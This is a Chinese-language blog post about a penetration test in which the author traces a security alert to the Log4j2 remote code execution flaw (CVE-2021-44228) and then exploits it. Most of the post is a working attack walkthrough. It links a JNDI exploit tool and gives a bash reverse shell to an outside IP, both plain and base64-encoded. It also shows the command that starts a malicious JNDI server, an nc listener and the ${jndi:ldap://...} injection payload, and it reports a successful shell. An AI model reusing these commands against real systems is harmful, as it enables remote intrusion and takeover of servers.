【记一次渗透测试无意发现的log4j2】

随笔3个月前发布 婴悦妈
32 0 0

【告警发现】

在测一个迎新网站的时候发现态势告警dnslog家族请求,看了一下态势感知mmp,我还没测出洞来呢咋服务器自己请求*kmbs6r7ovd.burpcollaborator.net日志了,

【记一次渗透测试无意发现的log4j2】

 

根据域名搜了一下日志没有发现,然后看了一下服务器的相关日志,在告警服务器请求bp域名之前是“Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)”的日志。

【记一次渗透测试无意发现的log4j2】

 

【工具准备】

1.jndi工具:https://github.com/sayers522/JNDI-Injection-Exploit

反弹shell payload

bash -i >& /dev/tcp/12211.222.22.48/6666 0>&1

2.base64编码在线:https://ares-x.com/tools/runtime-exec

bash -c {echo,YmFzaCAtaSA+xxxxxxxxxjEuMzYuMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

3.在vps开启jndi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAxxxxxxxxMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "12111111.36.111.42228"

【记一次渗透测试无意发现的log4j2】

 

4.在vps上监听反弹shell端口

nc -lvvp 6666

【记一次渗透测试无意发现的log4j2】

 【测试】

5.在每一个点测试payload

${jndi:ldap://asssssasdasdas/poc}

url编码

【记一次渗透测试无意发现的log4j2】

 

6.服务器加载恶意class类

【记一次渗透测试无意发现的log4j2】

 7.反弹shell成功

【记一次渗透测试无意发现的log4j2】

 态势告警

【记一次渗透测试无意发现的log4j2】

 【参考链接】

payload

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...